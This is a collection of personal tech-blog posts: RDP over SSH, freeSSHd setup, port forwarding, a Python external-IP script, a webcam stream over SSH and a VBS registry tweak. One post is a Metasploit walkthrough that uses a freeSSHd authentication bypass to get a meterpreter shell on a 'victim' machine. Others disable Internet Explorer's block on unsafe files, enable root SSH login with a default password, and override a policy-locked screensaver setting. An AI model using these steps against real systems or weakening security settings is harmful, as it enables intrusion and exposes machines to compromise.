How To: RDP Over SSH

So I have been using RDP over SSH for about the last year and I have found its stability to be much better than Logmein, teamviewer, VNC, and many others. While this method may not have all the fancy features that these other tools have, there is less lag, better performance overall, its free, its secure, and there is no middle server its direct point to point!


  1. SSHD server running on the windows machine you would like to RDP into. I would suggest using Cygwin rather than FreeSSHD due to security exploits.
  2. RDP/Remote Desktop Connections enable on this server. (This will be covered)
  3. The ability to setup port forwarding on your external router. Setup Forwarding
  4. The external IP Address of the network your server is connected to. Your IP
  5. Putty Client

Part One: Setting up the Windows Server.

Once you have a ssh server up and configured the next step is to enable RDP on your windows server.

  1. Open the start menu , right click on computer and select properties.



  2. In the properties window in the top left pane select remote settings.
  3. In the new “System Properties” window under the Remote tab check the box labeled “Allow Remote Assistance connections to this computer”
  4. Next in the same window  under the Remote Desktop section, select  “Allow connections from computers running any version of Remote Desktop” option.
  5. Then click “apply” , then “ok”.



Part Two: Setting up the Client machine for connection.

Once you have downloaded and opened the putty client it is time to set up the ssh session and tunnels.

  1. One the main putty page enter the external IP Address of your windows server the box labeled “Host Name (or IP address)”.



  2. In the left pane of the putty utility expand the SSH node and select Tunnels.
  3. In the box labeled “Source Port” enter a free port on your local system. For this I will use port 1234 as it is normally free.
  4. In the box labeled “Destination” enter the local IP address of your windows server followed by “:3389” the port for RDP.
  5. Leave the default settings below this set to “local” and “Auto”.
  6. Then Select “Add”.



  7. Now select the main putty page in the left pane at the very top labeled “Session”.
  8. In the “Saved Sessions” box enter a name you would like to save your configuration. as so you do not have to set this up again.
  9. Then press “Save”.



  10. Note: To open this session in the future select it from the list and select “Load”
  11. Then Select “Open” This will start the SSH session.
  12. Now for the final steps to open the RDP session. Open the start menu and search for “Remote Desktop Connection” and then open it.



  13. Then in the box labeled “Computer” enter Localhost: followed by the port selected to use in the putty configuration. In this case port 1234.
  14. Then Select Connect.



  15. Now it will prompt you with a credentials box. Just enter your account information and select “OK”.



  16. And Now you have a RDP Session over SSH!





Kali Linux: Hacking FreeSSHD on Windows to get a meterpreter shell

So I found and interesting exploit in metasploit today mainly out of boredom and I figured I would share here. Below you will find a step my step of how to use metasploit to exploit FreeSSHD on windows to get a meterpreter shell.

start: FreeSSHD on your windows Victim box and check for any custom ports.



start: mfsconsole in kali



search: ssh



copy: exploit/windows/ssh/freesshd_authbypass

run: use exploit/windows/ssh/freesshd_authbypass

run: show options



run: set RHOST [victim ip]

run: set RPORT [victim port running ssh]

run: set LHOST [host ip]

run: set LPORT [local listening port]



run: exploit



Note: This exploit uses a user name list for the attack if the user that the ssh service uses to authenticate is not in this list this exploit won’t work. However there is an option you can set if you know the username or wish to guess at it.

ex: set USERNAME crazy_user123456789

Note: Also you can always find larger user name lists and add them to the list that metasploit uses located at “/opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt” or you can change this path to point at your own list using the

ex: set USER_FILE /youpath/users.txt

Note: Kali of course has built in wordlist which you can find at the following location

ex: usr/share/dirbuster/wordlists/

Note: Once the exploit works you have a meterpreter shell :)

Solution if you are trying to protect against this attack, use a complicated username or use cygwin sshd for windows operating systems instead.

these files cannot be opened.

These files can’t be opened. Your Internet security settings prevented one or more files from being opened.

I came across this today while trying to run an unsigned, potentially harmful executable. There are plenty of recommendations out there on the web on how to fix this, but I found the fastest solution to be as follows.

Open internet explorer and select internet options:



Next select the security tab then restricted sites:



Now Select custom level and in the new window scroll down and enable “launching applications and unsafe files(not secure)”:



Select ok and agree to the warning:



Now try to run your executable. If this still does not work try using the above steps on the internet, local intranet, and trusted sites zones:



Hope this helps!

port forward config router

How to: Setup Port Forwarding For SSH

Port forwarding will allow you to connect to your SSH server from anywhere, and it is really easy to do.


Administrator access to your router
Putty client

Step 1: Login to router

Login to your router via a web browser using its IP address (default is

router browser login

Next you locate where you can setup port forwarding. In my case it is under  Applications & Gaming sub tab Single Port Forwarding.

Once located create a custom forward with the following settings:

Internal port: 22
IP address of your SSH server.

Save the settings.

port forward config router

Step 2: Get your external IP address

You can find your external IP address by visiting

 *Note: Unless you have a static IP provisioned by your ISP, your external IP address will most likely change often. There are several services that allow you to track the change, and assign a domain name to it (Never had much luck with them). I went with a much more simple approach. View the article here.

Step 3: Creating your first external connection

From computer outside your LAN open your putty client.
Enter your external IP address into the Hosts field and click open.

putty setup ext ssh session
If you receive a popup box like the following select yes to continue:

rsa key working ssh
Enter your username and password:

ssh login
Then you will receive a shell on the SSH server:

secure shell on remote ssh server

Related Articles:


How to: Setup a SSH Server on Windows

This How to will walkthrough the steps to setting up an free ssh server on Windows operating systems. The will allow ssh access (secure shell access) to windows command prompt, and provide you with the ability to utilize other tools like Putty(tunneling), and WinSCP(file transfers). This walk through will show you how to set this up within your LAN (Local Area Network).


SSH server software — For the use of this tutorial, freesshd will be used.
Putty client — ssh client

Step 1: Install freesshd

freesshd installer

Step 2: Configure freesshd

Once you have finished installing the ssh server, run the application. You will want to edit the settings:

Right click on the freesshd icon in the taskbar and select settings

freesshd taskbar settings

You may see that the ssh server is not running and it may not start when you attempt to start it. Do not fret your machine probably needs a reboot. However ever this can wait until after the configuration has finished. For the next steps we want the SSH server to be stopped.

freesshd server status

Most of the defaults are effective there is only one last thing to configure.

Select the Users tab and click add user:

freesshd add user

Add your windows user account name under login. If you are not attached to a domain just leave the domain field blank.
Then select the user permissions. (personally I selected them all.)
Select ok.

Now start your SSH server on the Server status tab. Reminder if it will not start remember to reboot your machine and try to start it again.

Step 3: Create your first SSH session.

Collect you computers ip address:
Press windows key + r.
Type cmd into the run dialogue box and hit enter.

run dialogue command prompt

In the command prompt type ipconfig and press enter. Your ip address will be listed under your adapter.

finding your ip address cmd ipconfig

From another computer on your LAN (local area network) download and run the putty client.

Type in your ip address of the SSH server then select open

putty setup for simple ssh session to windows

This will then prompt you for your user name and password. *Note: it will show nothing when you type your password in. Once complete this will open a Command Prompt Shell on the remote system.

ssh windows command prompt shell

Related articles:

How to transfer files to and from a windows server using ssh with WinSCP

How to setup port forwarding for ssh


Python: How to get external IP address

Here is a short simple way to get the external ip address of a machine using python. This of course is useful if your machine is sitting behind a router or a sub network. So unfortunately there is no one liner in python to grab your external ip address which means a third party service must be used. However you can be your own “third party” service if you own a website. (If you don’t you can always use mine!)

Step 1:

Create a php file called getmyip.php you will want to include the following code:


$ipaddress = $_SERVER["REMOTE_ADDR"];

Echo "Your IP is $ipaddress!";


Upload this to your website and mark the location.

Step 2:

Create a python file called you will want to include the following code:

import urllib

import re

def get_external_ip():
site = urllib.urlopen("").read() #if you want to use my website the url is:
ip=re.findall(r'[0-9]+(?:\.[0-9]+){3}', site)
address = ip[0]
print address
return address


Then just execute the python script.

You can find the source here


Vmware does not see an external usb device, wifi, drives, ect…

So recently I build all new machines. I specifically build a machine with tons of resources for all of my virtual machines. So naturally the first operating system I install in Vmware is Backtrack 5 R3 Gnome. I was excited to begin pentesting on my newly allocated machine. I wanted to start with a basic WiFi cracking test, to see how the machine handled the resources provided. I attached the USB WiFi card and realized that I could easily use it in windows, however when attempting to add it to the virtual machine, Vmware was not even recognizing it. I searched all over, and only found forum post and simple tech docs from Vmware explaining how to drop down the “VM” menu and select the device from the removable devices. Nothing mentioned how to added the device if Vmware was not even seeing it.

After a minute of refection on how I setup the Vm I remembered that it provided an option to use USB 3.0 devices, which I had selected. I removed the device from my USB 3.0 ports and moved it back to a regular USB 2.0 port and Vmware immediately found the device and attached it to the VM.

If you perform a simple search from google you will find that this a known issue that is “not yet fixed”

Google Search

Vmware Article / Tech docs

VmWare Technical Support Documentation

Their “Solution” more like work around is to use a USB 2.0 or 1.1 port.

My system Setup (if you would like to compare for troubleshooting issues)

OS Name Microsoft Windows 7 Home Premium
OS Manufacturer Microsoft Corporation
System Manufacturer System manufacturer
System Model System Product Name
System Type x64-based PC
Processor AMD A8-3870 APU with Radeon(tm) HD Graphics, 3000 Mhz, 4 Core(s), 4 Logical Processor(s)
Boot Device \Device\HarddiskVolume1
Hardware Abstraction Layer Version = “6.1.7601.17514”
Installed Physical Memory (RAM) 32.0 GB
Total Physical Memory 16.0 GB
Available Physical Memory 12.4 GB
Total Virtual Memory 32.0 GB
Available Virtual Memory 27.9 GB
Page File Space 16.0 GB

Vmware Workstation 9 completely up to date.

I will keep everyone posted as I know more.


How to Stream a Webcam through SSH with VLC on Backtrack 5 R3 Gnome 32


You will want to perform Steps 1 and 2 on both the server and the client.
Step 1: Install VLC and Fix it for Backtrack 5 

apt-get install vlc

hexedit /usr/bin/vlc

Press tab

replace geteuid._libc_start_main with getppid._libc_start_main



vlc “and it should now work”

Step 2: Setting up ssh “if you have never used it”

nano /etc/ssh/sshd_config

Add the following Lines or un-comment them if they are already there.

PermitRootLogin yes
UsePrivilegeSeparation yes

X11Forwarding yes
X11DisplayOffset 10
TCPKeepAlive yes

UsePAM yes

If you have not used ssh before you will need to generate keys run commands below:

Enter file in which to save the key (/root/.ssh/id_rsa):

Enter file in which to save the key (/root/.ssh/id_rsa):

Step 3: Now you will need to start ssh by running the command below:

start ssh

Step 4: Now that everything is setup lets start the webcam stream:

ssh -C -X root@serverip -L 9091:localhost:9091
“backtrack’s default is: toor”

Note: If you get an error about the SSH keys not matching.

gedit /root/.ssh/known_hosts

Then delete everything and save the file.

Then run the command below:

vlc v4l2:// :v4l2-dev=/dev/video0 :v4l2-adev=/dev/dsp :v4l2-standard=0 :sout="#transcode{vcodec=mp4v,vb=800,scale=1,acodec=mpga,ab=128, channels=2}:duplicate{dst=std{access=http,mux=ts,dst=localhost:9091}}"

Now open a new terminal and run this command:

vlc http://localhost:9091



How To: Change a registry key with VBS + User Input Screensaver Timeout Duration

So have you ever been working on a work computer and the screen saver timeout period is 15 minutes? Then you go to change it and the properties box is grayed out? Well there is good news you can change this through windows registries. The following vbs script does just that for Windows XP, Windows Vista, and Windows 7.

Now windows uses time in seconds. So 3600 seconds equals 1 hour. This script uses an input box to allow the time to be adjusted based on your preference.

All you have to do is copy and paste the code into notepad and save as screensaver.vbs That’s it double click the file, it will prompt you for a duration click ok and now your screensaver timeout duration has now been adjusted. You can look at the screensaver properties and you will see the change. Another option is to view it in regedit if you feel so inclined.

A video demonstration will be provided shortly.

'System variables
Dim objShell, RegLocate, RegLocate1
Set objShell = WScript.CreateObject("WScript.Shell")
'Creating the input box
strUserInput = InputBox( "Please enter Screen saver duration time out (3600 = 1 Hr) Default value is 900:" )

'Fucntion to check for vailid entries
Function InputCheck(strUserInput)
'checks to make sure that the input field is not blank
if strUserInput =0 then
'warning message box
MsgBox "Please enter a duration"
strUserInput = InputBox( "Please enter Screen saver duration time out (3600 = 1 Hr) Default value is 900:" )
End If
'checks to make sure that a negative number was not inserted
if strUserInput  'warning message box
MsgBox "Please enter a valid duration minimun value of 900s = 15 mintues"
strUserInput = InputBox( "Please enter Screen saver duration time out (3600 = 1 Hr) Default value is 900:" )
End If
'checks to make sure that the input is more than 900 seconds
if strUserInput  'warning message box
MsgBox "Please enter a valid duration minimun value of 900s = 15 mintues"
strUserInput = InputBox( "Please enter Screen saver duration time out (3600 = 1 Hr) Default value is 900:" )
End If
'if it passes all other input checks this actually submits the change and updates the registry
if strUserInput >899 then
On Error Resume Next
'selects the registry key to change
RegLocate = "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Control Panel\Desktop\ScreenSaveTimeOut"
'writes the registry Value and key with the registry value type
objShell.RegWrite RegLocate,strUserInput,"REG_SZ"
'Lets you know it worked
MsgBox "Your Duration has Changed Successfully"
'Ends the script
End if
End Function
'Calls the function to run the script
Dim result
result = InputCheck(strUSerInput)